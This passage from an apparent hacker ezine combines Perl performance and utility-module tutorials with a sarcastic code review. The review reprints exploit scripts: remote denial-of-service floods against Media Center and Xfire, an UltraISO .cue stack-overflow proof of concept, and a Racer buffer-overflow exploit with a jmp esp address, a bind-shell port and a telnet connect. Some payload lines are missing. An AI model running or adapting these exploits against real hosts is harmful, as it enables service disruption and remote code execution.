think their program is slow, and get it hopelessly wrong. Use a profiler.

Devel::DProf is in the perl core from version 5.6. If you're using an
earlier perl you can get it from CPAN.

You run your program with -d:DProf
    perl5.8.0 -d:DProf enc2xs.orig -Q -O -o /dev/null ...

which times things and stores the data in a file named tmon.out. Then you
run dprofpp to process the tmon.out file, and produce meaningful summary
information. This excerpt is the default length and format, but you can
use options to change things - see the man page. It also seems to show up
a minor bug in dprofpp, because it manages to total things up to get 106%.

While that's not right, it doesn't affect the explanation.
    Total Elapsed Time = 66.85123 Seconds
      User+System Time = 62.35543 Seconds
    Exclusive Times
    %Time ExclSec CumulS #Calls sec/call Csec/c  Name
     106.   66.70 102.59 218881   0.0003 0.0005  main::enter
     49.5   30.86 91.767      6   5.1443 15.294  main::compile_ucm
     19.2   12.01  8.333  45242   0.0003 0.0002  main::encode_U
     4.74   2.953  1.078  45242   0.0001 0.0000  utf8::unicode_to_native
     4.16   2.595  0.718  45242   0.0001 0.0000  utf8::encode
     0.09   0.055  0.054      5   0.0109 0.0108  main::BEGIN
     0.01   0.008  0.008      1   0.0078 0.0078  Getopt::Std::getopts
     0.00   0.000 -0.000      1   0.0000      -  Exporter::import
     0.00   0.000 -0.000      3   0.0000      -  strict::bits
     0.00   0.000 -0.000      1   0.0000      -  strict::import
     0.00   0.000 -0.000      2   0.0000      -  strict::unimport

At the top of the list, the subroutine enter takes about half the total
CPU time, with 200,000 calls, each very fast. That makes it a good
candidate to optimise, because all you have to do is make a slight change
that gives a small speedup, and that gain will be magnified 200,000 times.
[It turned out that enter was tail recursive, and part of the speed gain I
got was by making it loop instead]

Third on the list is encode_U, which with 45,000 calls is similar, and
worth looking at. [Actually, it was trivial code and in the real enc2xs I
inlined it]

utf8::unicode_to_native and utf8::encode are built-ins, so you won't be
able to change that.

Don't bother below there, as you've accounted for 90% of total program
time, so even if you did a perfect job on everything else, you could only
make the program run 10% faster.

compile_ucm is trickier - it's only called 6 times, so it's not obvious
where to look for what's slow. Maybe there's a loop with many iterations.
But now you're guessing, which isn't good.

One trick is to break it into several subroutines, just for benchmarking,
so that DProf gives you times for different bits. That way you can see
where the juicy bits to optimise are.

Devel::SmallProf should do line by line profiling, but every time I use it
it seems to crash.


Now you've identified the slow spots, you need to try alternative code to
see if you can find something faster. The Benchmark module makes this
easy. A particularly good subroutine is cmpthese, which takes code
snippets and plots a chart. cmpthese was added to Benchmark with perl 5.6.

So to compare two code snippets orig and new by running each for 10000
times you'd do this:
    use Benchmark ':all';
    sub orig {
    sub new {
    cmpthese (10000, { orig => /&orig, new => /&new } );

Benchmark runs both, times them, and then prints out a helpful comparison
    Benchmark: timing 10000 iterations of new, orig...
	   new:  1 wallclock secs ( 0.70 usr +	0.00 sys =  0.70 CPU) @
14222.22/s (n=10000)
	  orig:  4 wallclock secs ( 3.94 usr +	0.00 sys =  3.94 CPU) @
2539.68/s (n=10000)
	    Rate orig  new
    orig  2540/s   -- -82%
    new  14222/s 460%	--

and it's plain to see that my new code is over 4 times as fast as my
original code.

What causes slowness in perl?

Actually, I didn't tell the whole truth earlier about what causes slowness
in perl. [And astute hecklers such as Philip Newton had already told me

When perl compilers your program it breaks it down into a sequence of
operations it must perform, which are usually referred to as ops. So when
you ask perl to compute $a = $b + $c it actually breaks it down into these
Fetch $b onto the stack
Fetch $c onto the stack
Add the top two things on the stack together; write the result to the
Fetch the address of $a
Place the thing on the top of stack into that address

Computers are fast at simple things like addition. But there is quite a
lot of overhead involved in keeping track of "which op am I currently
performing" and "where is the next op", and this book-keeping often swamps
the time taken to actually run the ops. So often in perl it's the number
of ops your program takes to perform its task that is more important than
the CPU they use or the RAM it needs. The hit list is

So what were my example code snippets that I Benchmarked?

It was code to split a line of hex (54726164696e67207374796c652f6d61) into
groups of 4 digits (5472 6164 696e ...) , and convert each to a number
    sub orig {
       map {hex $_} $line =~ /(....)/g;
    sub new {
       unpack "n*", pack "H*", $line;

The two produce the same results:
21618, 24932, 26990, 26400, 29556, 31084, 25903, 28001, 26990, 29793,
26990, 24930, 26988, 26996, 31008, 26223, 29216, 29552, 25957, 25646	 

21618, 24932, 26990, 26400, 29556, 31084, 25903, 28001, 26990, 29793,
26990, 24930, 26988, 26996, 31008, 26223, 29216, 29552, 25957, 25646

but the first one is much slower. Why? Following the data path from right
to left, it starts well with a global regexp, which is only one op and
therefore a fast way to generate a list of the 4 digit groups. But that
map block is actually an implicit loop, so for each 4 digit block it
iterates round and repeatedly calls hex. Thats at least one op for every
list item.

Whereas the second one has no loops in it, implicit or explicit. It uses
one pack to convert the hex temporarily into a binary string, and then one
unpack to convert that string into a list of numbers. n is big endian 16
bit quantities. I didn't know that - I had to look it up. But when the
profiler told me that this part of the original code was a performance
bottleneck, the first think that I did was to look at the the pack docs to
see if I could use some sort of pack/unpack as a speedier replacement.
Ops are bad, m'kay

You can ask perl to tell you the ops that it generates for particular code
with the Terse backend to the compiler. For example, here's a 1 liner to
show the ops in the original code:

$ perl -MO=Terse -e'map {hex $_} $line =~ /(....)/g;'
    LISTOP (0x16d9c8) leave [1]
	OP (0x16d9f0) enter
	COP (0x16d988) nextstate
	LOGOP (0x16d940) mapwhile [2]
	    LISTOP (0x16d8f8) mapstart
		OP (0x16d920) pushmark
		UNOP (0x16d968) null
		    UNOP (0x16d7e0) null
			LISTOP (0x115370) scope
			    OP (0x16bb40) null [174]
			    UNOP (0x16d6e0) hex [1]
				UNOP (0x16d6c0) null [15]
				    SVOP (0x10e6b8) gvsv  GV (0xf4224) *_
		PMOP (0x114b28) match /(....)/
		    UNOP (0x16d7b0) null [15]
			SVOP (0x16d700) gvsv  GV (0x111f10) *line

At the bottom you can see how the match /(....)/ is just one op. But the
next diagonal line of ops from mapwhile down to the match are all the ops
that make up the map. Lots of them. And they get run each time round map's
loop. [Note also that the {}s mean that map enters scope each time round
the loop. That not a trivially cheap op either]

Whereas my replacement code looks like this:

$ perl -MO=Terse -e'unpack "n*", pack "H*", $line;'
    LISTOP (0x16d818) leave [1]
	OP (0x16d840) enter
	COP (0x16bb40) nextstate
	LISTOP (0x16d7d0) unpack
	    OP (0x16d7f8) null [3]
	    SVOP (0x10e6b8) const  PV (0x111f94) "n*"
	    LISTOP (0x115370) pack [1]
		OP (0x16d7b0) pushmark
		SVOP (0x16d6c0) const  PV (0x111f10) "H*"
		UNOP (0x16d790) null [15]
		    SVOP (0x16d6e0) gvsv  GV (0x111f34) *line

There are less ops in total. And no loops, so all the ops you see execute
only once.  :-) 

[My helpful hecklers pointed out that it's hard to work out what an op is.
Good call. There's roughly one op per symbol (function, operator, variable
name, and any other bit of perl syntax). So if you golf down the number of
functions and operators your program runs, then you'll be reducing the
number of ops.]

[These were supposed to be the bonus slides. I talked to fast (quelle
surprise) and so manage to actually get through the lot with time for


Caches function results

MJD's Memoize follows the grand perl tradition by trading memory for
speed. You tell Memoize the name(s) of functions you'd like to speed up,
and it does symbol table games to transparently intercept calls to them.
It looks at the parameters the function was called with, and uses them to
decide what to do next. If it hasn't seen a particular set of parameters
before, it calls the original function with the parameters. However,
before returning the result, it stores it in a hash for that function,
keyed by the function's parameters. If it has seen the parameters before,
then it just returns the result direct from the hash, without even
bothering to call the function.

For functions that only calculate

This is useful for functions that calculate things with no side effects,
slow functions that you often call repeatedly with the same parameters.
It's not useful for functions that do things external to the program (such
as generating output), nor is it good for very small, fast functions.

Can tie cache to a disk file

The hash Memoize uses is a regular perl hash. This means that you can tie
the hash to a disk file. This allows Memoize to remember things across
runs of your program. That way, you could use Memoize in a CGI to cache
static content that you only generate on demand (but remember you'll need
file locking). The first person who requests something has to wait for the
generation routine, but everyone else gets it straight from the cache. You
can also arrange for another program to periodically expire results from
the cache. 

As of 5.8 Memoize module has been assimilated into the core. Users of
earlier perl can get it from CPAN.


These are quite general ideas for optimisation that aren't particularly
perl specific.

Pull things out of loops

perl's hash lookups are fast. But they aren't as fast as a lexical
variable. enc2xs was calling a function each time round a loop based on a
hash lookup using $type as the key. The value of $type didn't change, so I
pulled the lookup out above the loop into a lexical variable: 
    my $type_func = $encode_types{$type};

and doing it only once was faster.

Experiment with number of arguments

Something else I found was that enc2xs was calling a function which took
several arguments from a small number of places. The function contained
code to set defaults if some of the arguments were not supplied. I found
that the way the program ran, most of the calls passed in all the values
and didn't need the defaults. Changing the function to not set defaults,
and writing those defaults out explicitly where needed bought me a speed

Tail recursion

Tail recursion is where the last thing a function does it call itself
again with slightly different arguments. It's a common idiom, and some
languages can automatically optimise it away. Perl is not one of those
languages. So every time a function tail recurses you have another
subroutine call [not cheap - Arthur Bergman notes that it is 10 pages of C
source, and will blow the instruction cache on a CPU] and re-entering that
subroutine again causes more memory to be allocated to store a new set of
lexical variables [also not cheap]. 

perl can't spot that it could just throw away the old lexicals and re-use
their space, but you can, so you can save CPU and RAM by re-writing your
tail recursive subroutines with loops. In general, trying to reduce
recursion by replacing it with iterative algorithms should speed things

yay for y

y, or tr, is the transliteration operator. It's not as powerful as the
general purpose regular expression engine, but for the things it can do it
is often faster.

tr/!// # fastest way to count chars

tr doesn't delete characters unless you use the /d flag. If you don't even
have any replacement characters then it treats its target as read only. In
scalar context it returns the number of characters that matched. It's the
fastest way to count the number of occurrences of single characters and
character ranges. (ie it's faster than counting the elements returned by
m/.../g in list context. But if you just want to see whether one or more
of a character is present use m/.../, because it will stop at the u first,
whereas tr/// has to go to the end)

tr/q/Q/ faster than s/q/Q/g

tr is also faster than the regexp engine for doing character-for-character

tr/a-z//d faster than s/[a-z]//g

tr is faster than the regexp engines for doing character range deletions.
[When writing the slide I assumed that it would be faster for single
character deletions, but I Benchmarked things and found that s///g was
faster for them. So never guess timings; always test things. You'll be
surprised, but that's better than being wrong] 
Ops are bad, m'kay

Another example lifted straight from enc2xs of something that I managed to
accelerate quite a bit by reducing the number of ops run. The code takes a
scalar, and prints out each byte as /x followed by 2 digits of hex, as
it's generating C source code:
    #foreach my $c (split(//,$out_bytes)) {
    #  $s .= sprintf "//x%02X",ord($c);
    # 9.5% faster changing that loop to this:
    $s .= sprintf +("//x%02X" x length $out_bytes), unpack "C*",

The original makes a temporary list with split [not bad in itself - ops
are more important than CPU or RAM] and then loops over it. Each time
round the loop it executes several ops, including using ord to convert the
byte to its numeric value, and then using sprintf with the format
"//x%02X" to convert that number to the C source.

The new code effectively merges the split and looped ord into one op,
using unpack's C format to generate the list of numeric values directly.
The more interesting (arguably sick) part is the format to sprintf, which
is inside +(...). You can see from the .= in the original that the code is
just concatenating the converted form of each byte together. So instead of
making sprintf convert each value in turn, only for perl ops to stick them
together, I use x to replicate the per-byte format string once for each
byte I'm about to convert. There's now one "//x%02X" for each of the
numbers in the list passed from unpack to sprintf, so sprintf just does
what it's told. And sprintf is faster than perl ops.

How to make perl fast enough

use the language's fast features

You have enormous power at your disposal with regexps, pack, unpack and
sprintf. So why not use them? 

All the pack and unpack code is implemented in pure C, so doesn't have any
of the book-keeping overhead of perl ops. sprintf too is pure C, so it's
fast. The regexp engine uses its own private bytecode, but it's specially
tuned for regexps, so it runs much faster than general perl code. And the
implementation of tr has less to do than the regexp engine, so it's

For maximum power, remember that you can generate regexps and the formats
for pack, unpack and sprintf at run time, based on your data.

give the interpreter hints

Make it obvious to the interpreter what you're up to. Avoid $&, use
(?:...) when you don't need capturing, and put the /o flag on constant

less OPs

Try to accomplish your tasks using less operations. If you find you have
to optimise an existing program then this is where to start - golf is
good, but remember it's run time strokes not source code strokes.

less CPU

Usually you want to find ways of using less CPU.

less RAM

but don't forget to think about how your data structures work to see if
you can make them use less RAM.

-[0x07] # His name is not a joke, but he is ------------------------------

##Credit to n00b for finding this bug..^ ^
#Media Center 11 d0s exploit overly long string.
#TiVo server plugin..Runs on port tcp :8070
#Also J. River UPnP Server Version 1.0.34
#is also afected by the same bug which is just a
#dos exploit.As we know the port always changes for the
#UPnP server so you may have to modify the proof of concept a little
#This exploit will deny legitimate user's from using the service
#We should see a error with the following msg Upon sucsessfull
#All 3 of the server plugin's will fail includin the library server which
#is set to port :80 by default.The only debug info i was able to collect
#at crash time is also provided with the proof of concept.
#As you can see from the debug info provided we canot control any memory
#Shout's to aelph and every-one who has helped me over the year's.
#   X  Microsoft Visual C ++ Runtime Library
#   Buffer overrun detected!
#   C:/Program Files/J River/Media Center 11/Media center.exe
#   A Buffer overrun has been detected which has corrupted the program's
#   internal state. The program cannot safely continue execution and must
#   be now terminated.
#						    Bah fucking shame..
#o/s info: win xp sp.2	Media Center 11.0.309 (not registered)
#			// DEBUG INFO //
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0	       nv up ei pl nz na
pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000		 
#7ffe0304 c3		   ret

print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's
are vuln by n00b /n";

use IO::Socket; # use warnings; use strict;

$ip = $ARGV[0]; # my $ip = shift or die usage();

$payload = "/x41"x5500; 

if(!$ip) # You're a dumb nut

die "you forgot the ip dumb nut/n";


$port = '8070'; # Dumb nut

$protocol = 'tcp'; # Dumb nut, useless variable

$socket = IO::Socket::INET->new(PeerAddr=>$ip,
			       Timeout=>'1') || die "Make sure service is
running on the port/n"; 
# Make sure brain is implanted in that light blub you call head

print $socket $payload;

close($socket); # close $socket

# [2006-09-05]

#Moderator of
#X fire version:new Release 1.64 <12th, 2006>
# Comments removed due to high level of homosexuality
print " 0day Xfire remote dos exploit coded by n00b Release 1.64 <12th,
2006> /n";
use IO::Socket; # use warnings; use strict;
$ip = $ARGV[0]; # my $ip = shift or usage();
# Trying to look leet now? Or did we completely forget the 'x' operator now?
$payload = "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". 

if(!$ip) # Remember perldoc
die "remember the ip/n";
$protocol = 'udp'; # Stop making useless variable

$socket = IO::Socket::INET->new(PeerAddr=>$ip,
			       Timeout=>'1') || die "Make sure service is
running on the port/n";

print $socket $payload;
close($socket); # close $socket;
print "client has died h00ha /n"; # Learn2program, then learn2perl

# [2006-10-16]

#Credit:To n00b for finding this bug and writing poc.
#Ultra ISO stack over flow poc code.
#Ultra iso is exploitable via opening
#a specially crafted Cue file..There is 
#A limitation that the user must have the bin 
#file in the same dir as the cue file.
#This is the reason i have provided the 
#Bin file also Command execution is possible
#As we can control $ebp and $eip hoooooha.
#I will be working on the local exploit 
#as soon as i get a chance this should be a straight forward 
#to exploit this as we already gain control of the
#$eip register..
#Tested on :win xp service pack 2 
#Vendor's web site:
# Version affected: UltraISO
#Debug info as follows.
#Program received signal SIGSEGV, Segmentation fault.
#[Switching to thread 1696.0x6d0]
#0x41414141 in ?? ()
#(gdb) i r
#eax		0x0	 0
#ecx		0x7ce2fc 8184572
#edx		0x1	 1
#ebx		0xfe6468 16671848
#esp		0x13ecf8 0x13ecf8
#ebp		0x41414141	 0x41414141
#esi		0x0	 0
#edi		0x13fa18 1309208
#eip		0x41414141	 0x41414141
#eflags 	0x10246  66118
#cs		0x1b	 27
#ss		0x23	 35
#ds		0x23	 35
#es		0x23	 35
#fs		0x3b	 59
#gs		0x0	 0
#fctrl		0xffff1273	 -60813
#fstat		0xffff0000	 -65536
#ftag		0xffffffff	 -1
#fiseg		0x0	 0
#fioff		0x0	 0
#foseg		0xffff0000	 -65536
#fooff		0x0	 0
#---Type <return> to continue, or q <return> to quit---
#fop		0x0	 0

print "0day Ultra-Iso stack over flow poc  /n";
print "Credits to n00b for finding the bug and writing poc/n";
print "I will be writing a local exploit for this in a few days/n";
print "Shouts:	- Str0ke - Marsu  - SM - Aelphaeis - vade79 - c0ntex/n";

my $CUEFILE="1.cue"; #Do not edit this # How come? Why not?

my $BINFILE="1.bin"; #Do not edit this # How come? Why not?

my $header= "/x46/x49/x4c/x45/x20/x22";

my $endheader=

open(CUE, ">$CUEFILE") or die "ERROR:$CUEFILE/n"; 
# you started off good using lexical variables, why stop now?

open(BIN, ">$BINFILE") or die "ERROR:$BINFILE/n"; 
# YES! File handles are VARIABLES

print CUE $header;

for ($i = 0; $i < 1024; $i++) { #Fill our buffer 
# GAY c-style loop, totally unnecessary
$buffer.= "/x41"; #For easy of debugging 
# It's official you forgot about the 'x' operator
print CUE $buffer;

for ($i = 0; $i < 100; $i++) { #Fill our buffer #  :( 
$buffer2.= "/x90"; #Fill our bin file with nops..Why not pmsl.
print BIN $buffer2;

print CUE $endheader;

close(CUE,BIN); #  :( 

sleep(5); #  :( 

# print <<'GAYMESSAGE'
print "Files have been created success-fully/n";			  
      # Multiline, quotefree
print "Please note you will have to have both 1.cue and 1.bin in the same
dir/n";  # uselessness here
print "To be able to reproduce the bug open the 1.cue file with
ultra~iso/n"; # end with 
# [2007-05-24]

###Credit's to n00b.
#Racer v0.5.3 beta 5 (12-03-07) remote exploit.
#Racer is also prone to a buffer over flow in the
#server and client.Automatically the game open's
#Udp port 26000 and is waiting for a msg buffer.
#If we send an overly long buffer we are able to
#Control the eip register and esp hold's enough
#buffer to have a good size shell code.
#Tested: Win Xp sp2 English
#Vendor's web site:
#Affected version's: all version's.
#Tested on: Racer v0.5.3 beta 5 (12-03-07).
#Special thank's to str0ke.

print <<End; # Not bad, still sucky
Racer v0.5.3 beta 5 (12-03-07) remote exploit
Credit's to n00b for finding this bug and writing
the exploit.This exploit work's for the client
and the server.

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo
Luigi Auriemma.
(*)Please wait

sleep 8; # Good, good
system("cls"); # GAY GAY

use IO::Socket;

$ip = $ARGV[0]; # GAY


#jmp esp 0x77D8AF0A user32.dll english
$jmpcode = "/x0A/xAF/xD8/x77";

#win32_bind -EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
# */.
$shellcode =

$payload2 = "B"x500;

# check it earlier
if(!$ip) # Useless

die "remember the ip/n";


$port = '26000'; # Alright now, you die.

$protocol = 'udp'; #  :( 

$socket = IO::Socket::INET->new(PeerAddr=>$ip,
			       Timeout=>'1') || die "Make sure service
is running on the port/n";
	# die "please keep your dirty ape hands off perl.

print $socket $payload1,$jmpcode,$shellcode,$payload2,;
print "[+]Sending malicious payload./n";
sleep 2;
print "[+]Done !!./n";
sleep 5;
print " + Connecting on port 4444 of $host .../n";
system("telnet $ip 4444"); # OMFG!

## WTF is this doing here?

#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
# C:/Documents and Settings/****/Desktop/racer053b5>

# [2007-08-13]

-[0x08] # merlyn discusses common tools ----------------------------------

One of my favorite television lines stuck in my slowly aging brain comes
from the mid-60's campy Batman television series. Whenever Batman (played
by Adam West: I sat next to him during a cross-country flight a few years
ago and had a fun conversation) was stuck in a tight situation, he uttered
the painfully halting ``must.. get.. to.. my.. utility.. belt'' phrase.
Everything he needed to get out of this episode's trouble was in that
belt, if somewhat magically. If he needed to repel sharks: there it was,
the shark repellant. If he needed to dissolve glue: yep, there's the glue
dissolver. What a magical time of television!

Perl also has its own ``utility belts'', namely Scalar::Util and
List::Util. These modules were added into the core around Perl version
5.8, although you can install them from the CPAN into any modern Perl
version. Let's take a look at what our Perl utility belts contain.

By default, neither of these modules export any subroutines, so we'll need
to ask for these functions explicitly by import.

The blessed function of Scalar::Util tells us the classname of a blessed
reference, or undef otherwise. For example:
  use Scalar::Util qw(blessed);
  blessed "foo"; # undef
  blessed bless [], "Foo"; # "Foo"
  blessed bless {}, "Bar"; # "Bar"

At first glance, this seems similar to the ref builtin function. However,
consider this:
  ref []; # "ARRAY"
  blessed []; # undef

Yes, for an unblessed reference, ref returns the primitive data type (such
as ARRAY or HASH), while blessed returns undef.

The dualvar function helps us create a single value that acts like the $!
built-in. $! is odd in that it has one value in a numeric context (the
error number, such as 13), and a related but different value in a string
context (the error string, such as Permission denied). We can create a
similar value using dualvar:
  use Scalar::Util qw(dualvar);
  my $result = dualvar(13, "Permission Denied");
  if ($result == 13) { ... } # true
  if ($result =~ /denied/i) { ... } # also true!

For a more powerful version of this, look at Contextual::Return in the
CPAN. This same example would be written:
  use Contextual::Return;
  my $result = NUM { 13 } STR { "Permission Denied" };

I'll save the rest of that cool module for another time.

I've never used isvstring from Scalar::Util, because vstrings are a
deprecated feature, although still supported in version 5.8. However,
since I'm the originator of the JAPH, I figure I'll illustrate this using
  use Scalar::Util qw(isvstring);
  my $japh =
  print $japh, "/n"; # prints "Just another Perl hacker,/n"
  if (isvstring $japh) { ... } # true

Apparently, the fact that my JAPH came from a vstring is remembered as
part of the string, and isvstring can detect that.

Using a string as a number in Perl is well-defined: the string is
converted to a number (and cached), and the resulting number is used in
the expression. An ugly string that doesn't exactly look like a number
converts as a 0, and if warnings are enabled, we get an Argument ... isn't
numeric message. Internally, Perl calls looks_like_number to decide how
numeric the value might be, and we can get to that at the Perl level as
  use Scalar::Util qw(looks_like_number);
  my $age;
    print "How old are you? ";
    chomp($age = <STDIN>);
    print ("$age isn't a number, try again/n"), redo
      unless looks_like_number $age;

The openhandle function detects whether a reference or glob is connected
to an open filehandle:
  use Scalar::Util qw(openhandle);
  if (openhandle(*STDIN)) { ... } # glob
  if (openhandle(/*STDIN)) { ... } # reference

The classic way of testing this was to use defined fileno, as in:
  if (defined fileno $somereference) { ... }

However, this breaks down for tied filehandles:
  BEGIN { package Dummy; sub TIEHANDLE { bless {}, shift } }
  tie (*FOO, "Dummy");
  if (defined fileno *FOO) { ... } # tries to call tied(*FOO)->FILENO
  if (openhandle *FOO) { ... } # returns true

The readonly function detects whether a value is read-only, such as a
constant, or a variable that is aliased to a constant:
  use Scalar::Util qw(readonly);
  readonly 3; # true
  readonly $x; # false, unless $x is aliased to a read-only value

An example of where this aliasing might occur is in a subroutine call:
  sub is_readonly {
    print "$_[0] is ";
    print "not " unless readonly $_[0];
    print "read-only/n";
  is_readonly(3); # prints 3 is read-only
  is_readonly(my $x = 0); # prints 0 is not read-only

I've never used the refaddr function, but it looks like a nice way to
detect whether a scalar is a reference or not, and if so, what the memory
address might be:
  use Scalar::Util qw(refaddr);
  refaddr "hello"; # undef
  refaddr []; # some numeric value

I've seen refaddr used as a key to a hash when constructing inside-out

As yet another way to look at references, consider reftype, which returns
the primitive type of a reference, or undef otherwise:
  use Scalar::Util qw(reftype);
  reftype "hello"; # undef
  reftype []; # "ARRAY"
  reftype {}; # "HASH"
  reftype bless [], "Foo"; # "ARRAY"

Note that this differs from the built-in ref because ref returns the
blessed class for objects, and can be fooled to return one of the built-in
names if you're really perverse:
  ref bless [], "Foo"; # "Foo"
  ref bless {}, "ARRAY"; # "ARRAY" (don't do this!)

I've also never used the set_prototype function, and subroutine prototypes
are generally discouraged, but I'll mention it here anyway for
  use Scalar::Util qw(set_prototype);
  my $s = sub { ... };
  set_prototype $s, '$$';
  # same as: $s = sub ($$) { ... };

The tainted function determines whether a value is tainted. When Perl is
operating with taint enabled, and a value comes in from the dangerous
outside world, the value is marked as tainted, and nearly any calculation
that uses a tainted in any way also results in a tainted value. If a
tainted value is used in a dangerous way, Perl aborts, hopefully saving
you from potential harm.
  use Scalar::Util qw(tainted);
  tainted "foo"; # false (internal value)
  tainted $ENV{HOME}; # true if running under -T (external value)
  $ENV{HOME} = "/";
  tainted $ENV{HOME}; # now false

The weaken function weakens its lvalue (scalar variable) argument so that
the reference contained within the variable is weak. A weak reference
still functions as a normal reference with respect to dereferencing, but
does not count as a reference when Perl is considering whether there are
any references to a value. Incidentally, a copy of a weak reference is not
also weak, unless you also weaken it.

Typically, weak references are used in self-referential data structures.
For example, consider some hashrefs representing nodes in a tree, each of
which has an arrayref element of kids pointing at the children, and a
parent element pointing back upwards. Let's make the root, and two leaf
  my $root = {};
  my $leaf1 = { parent => $root };
  my $leaf2 = { parent => $root };

and now let's set up the kids in the root:
  push @$root{kids}, $leaf1, $leaf2;

At this point, we have a self-referential data structure. Even if these
variables are all lexically local to a subroutine, the subroutine will
leak memory each time it is called, because there's always at least one
reference to each of three hashes. To fix this, we must weaken the parent
  use Scalar::Util qw(weaken);
  my $root = {};
  my $leaf1 = { parent => $root };
  weaken $leaf1->{parent};
  my $leaf2 = { parent => $root };
  weaken $leaf2->{parent};
  push @$root{kids}, $leaf1, $leaf2;

Now, we can get from the root to the kids, and from the kids to the root,
using the existing references. However, the links from the kids to the
root won't count, so Perl treats the literal $root as the only path to
that hash. When $root goes out of scope, any weakened references to the
hash (as in, the values for each of the parent uplinks) are set to undef.
The refcounts of the two kids nodes are also reduced. If $leaf1 and $leaf2
are also going out of scope, then the corresponding hashes are also now
unreferenced, causing the entire data structure to disappear.

We can detect a weak reference using isweak:
  use Scalar::Util qw(isweak);
  isweak $root->{kids}[0]; # false
  isweak $leaf1->{parent}; # true

Note that weaken and isweak appear only when you install the ``XS''
version of the module.

That wraps up the Scalar::Util-ity belt. Next month, I'll examine
List::Util. Until then, enjoy!

# Month zooms by...

Last month, I introduced the Scalar::Util super hero of the
Scalar/List-Util dynamic duo, describing how a somewhat-overlooked
standard library can simplify some of your common tasks. In this month's
column, I'll examine List::Util for the help it can provide to your list
tasks. I'll also look at List::MoreUtils for some additional common list
operations, if you don't mind a quick CPAN install. (And you'll need to
install List::Util from the CPAN anyway if you're running something prior
to Perl 5.8.)

Like Scalar::Util, the List::Util module doesn't export any subroutines by
default. That means that you'll need to ask for each of these routines
explicitly with use.

First, let's look at (the appropriately titled) first. Let's say you have
a list of items, and you want to find the first one that is greater than
ten characters. Simply pull out first, like this:
  use List::Util qw(first);
  my $big_enough = first { length > 10 } @the_list;

The first routine walks through the list similar to grep or map, placing
each item into $_. The block is then evaluated, looking for a true or
false value. If true, the corresponding value of $_ is returned
immediately. If every evaluation of the block returns false, then first
returns undef.

Note that this is similar to:
  my ($big_enough) = grep { length $_ > 10 } @the_list;

However, the first routine avoids testing the remainder of the list once
we have found our item of choice. For short lists, we might not care, but
for long lists, this can save us some time if we expect a true value
somewhat early in the list.

We do lose a tiny bit of information with first as well. If undef is a
significant return value, we can't tell the undef as one of the list
members from the undef returned at the end of the list. For example, if we
wanted the ``first undef'' from a list:
  my $first_undef = first { not defined $_ } @items;

we couldn't tell if this was returning a ``found'' undef, or a ``not
found'' signal (also undef). In the grep equivalent, we can see whether
there are zero or non-zero elements assigned:
  if (my ($first_undef) = grep { not defined $_ } @items) {
    # really found an undef
  } else {
    # no undef found

Admittedly, I can't recall where I've ever cared that much. But it's an
interesting thing to think about when designing return values from
functions. But enough on first. Let's move on.

The next easy utility to describe from List::Util is shuffle. Yes, many
programs need a randomly ordered list of values, and here we have it as a
simple word:
  use List::Util qw(shuffle);
  my @deck = shuffle
    map { "C$_", "D$_", "H$_", "S$_" }
      0..9, qw(A K Q J);

Now our deck of cards is shuffled, and rather fairly and quickly. Like
sorting, shuffling is one of those things that looks rather easy to
implement, but turns out to have tricky parts to get right. And in the
normal List::Util installation, this is implemented at the C level (using
XS), so it's quite fast.

One of my favorite ``obscure but cool once you understand it'' functions
in list-processing languages is reduce, and although Perl doesn't have it
is as a built-in, we can at least get to it with List::Util.

Similar to sort, reduce takes a block argument that references $a and $b.
This is best illustrated by example:
  use List::Util qw(reduce);
  my $total = reduce { $a + $b } 1, 2, 4, 8, 16;

For the first evaluation of the block, $a and $b take on the first and
second elements of the list: 1 and 2 in this case. The block is evaluated
(returning 3), and this value is placed back into $a, and the next value
is placed in $b (4). Once again, the block is evaluated (7), and the
result placed in $a, and a new $b comes from the list. When there are no
more items in the list, the result is returned instead. The effect is if
we had written:
  my $total = ((((1 + 2) + 4) + 8) + 16);

but scaled for however many elements are in the list. Nice!

We can use it to compute a factorial for $n:
  my $factorial_n = reduce { $a * $b } 1..$n;

Or recognize a series of binary digits as a number:
  my $number = reduce { 2 * $a + $b } 1, 1, 0, 0, 1; # 0b11001

We could even rewrite join in terms of reduce:
  sub my_join {
    my $glue = shift;
    return reduce { $a . $glue . $b } @_;

By adding some smarts into the block, we can find the numeric maximum of a
list of values:
  my $numeric_max = reduce { $a > $b ? $a : $b } @inputs;

This works because we select the winner of any given pair of values, and
if we keep carrying that winner forward, eventually the winningest winner
comes out the end.

For a string maximum (``z'' preferred to ``a''), just change the type of
the comparison:
  my $numeric_max = reduce { $a gt $b ? $a : $b } @inputs;

And for minimums, we can change the order of the comparison, or swap the
selection of $a and $b.

For convenience, List::Util provides max, maxstr, min, minstr, and sum

I learned Smalltalk long before I learned Perl, and got quite fond of the
inject:into: method for collections. The reduce routine maps rather
nicely, if I think of Smalltalk's:
  aCollection inject: firstValue into: [:a :b | "something with a and b"]

as Perl's:
  reduce { "something with $a and $b" } $firstValue, @aCollection;

In other words, another way of looking at reduce is that it transforms
that first element into the final result by invoking the block in a
specific way on all of the remaining elements of the list. So, you could
put a list of elements inside an array ref with:
  my $array_ref = reduce { push @$a, $b; $a } [], @some_list;

Or create a hash with:
  my $hash_ref = reduce { $a->{$b} = 1; $a } {}, @some_list;

Note that on each iteration, $a is used, and also returned to become the
new $a or the final result. This is reminiscent of the many uses of
inject:into: in the Smalltalk images I've seen.

That wraps up List::Util, but I've still got a few inches of room here, so
let's take a quick look at the CPAN module List::MoreUtils. Although it
isn't part of the core, it's referenced in List::Util, because the module
provides a few handy shortcuts implemented (again) in C code for speed.
Like List::Util all imports must be specifically requested.

The any routine returns a boolean result if any of the items in the list
meet the given criterion, using a $_ proxy similar to grep or map:
  use List::MoreUtils qw(any);
  my $has_some_defined = any { defined $_ } @some_list;

This is done efficiently, returning a true value as soon as the block
returns a true value, and iterating to the end of the list only if none of
the elements meet the condition.

Similarly, all computes whether any of the elements fail to meet the
